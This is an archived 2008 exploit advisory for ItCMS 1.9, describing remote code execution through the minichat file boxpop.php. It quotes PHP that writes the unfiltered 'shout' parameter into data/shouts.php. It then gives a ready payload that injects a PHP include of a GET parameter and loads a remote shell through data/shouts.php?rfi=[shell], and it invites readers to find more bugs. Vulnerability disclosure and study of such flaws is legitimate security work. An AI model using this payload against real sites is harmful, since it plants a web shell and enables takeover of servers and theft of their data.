[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ItCMS 1.9 (boxpop.php) Remote Code Execution Vulnerability
# Published : 2008-05-02
# Author : Cod3rZ
# Previous Title : Open Auto Classifieds 1.4.3b Remote SQL Injection Vulnerabilities
# Next Title : Joomla Component Webhosting (catid) Blind SQL Injection Exploit
#===========================================================================================================================#
# _ ____ _ _ _ _ #
# __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ #
# / _/ _ / _` ||_ '_|_ / _ | ' / -_) | / _ V V / -_) '_ _ / -_) || | #
# _____/__,_|___/_| /__| (_) |_||____|_|____/_/_/___|_.__/ (_) ___|_,_| #
#===========================================================================================================================#
# ItCMS 1.9 Remote File Rewriting #
#===========================================================================================================================#
# Author : Cod3rZ #
#===========================================================================================================================#
# Site : http://cod3rz.helloweb.eu #
# Site : http://devilsnight.altervista.org #
#===========================================================================================================================#
# Remote File Rewriting: #
#===========================================================================================================================#
# /box/minichat/boxpop.php #
#===========================================================================================================================#
# if ($_POST["shout"]!=""){ #
# $shout = $_POST['shout']; #
# } else if ($_GET["shout"]!=""){ #
# $shout = $_GET["shout"]; #
# } #
# [...] #
# $shout = trim($shout); #
# $shout = stripslashes($shout); #
# $shout = str_replace ("rn", " [br] ", $shout); #
# $shout = first($shout); #
# [...] #
# $FileName="data/shouts.php"; #
# if($FilePointer=fopen($FileName, "a+")){ #
# fwrite($FilePointer,"$name|^|$shout|^|$date|^|$time|^|$_SERVER[REMOTE_ADDR]|^|n"); #
# fclose($FilePointer); #
#===========================================================================================================================#
# So, we can write a malicious code like <?php include($_GET['rfi']); ?> in the variable $shout, #
# and then we go in data/shouts.php?rfi=[shell] #
#===========================================================================================================================#
# There are many other bugs, find it yourself #
#===========================================================================================================================#
# Devils Night Corporation - http://devilsnight.altervista.org #
#===========================================================================================================================#
# www.Syue.com [2008-05-02]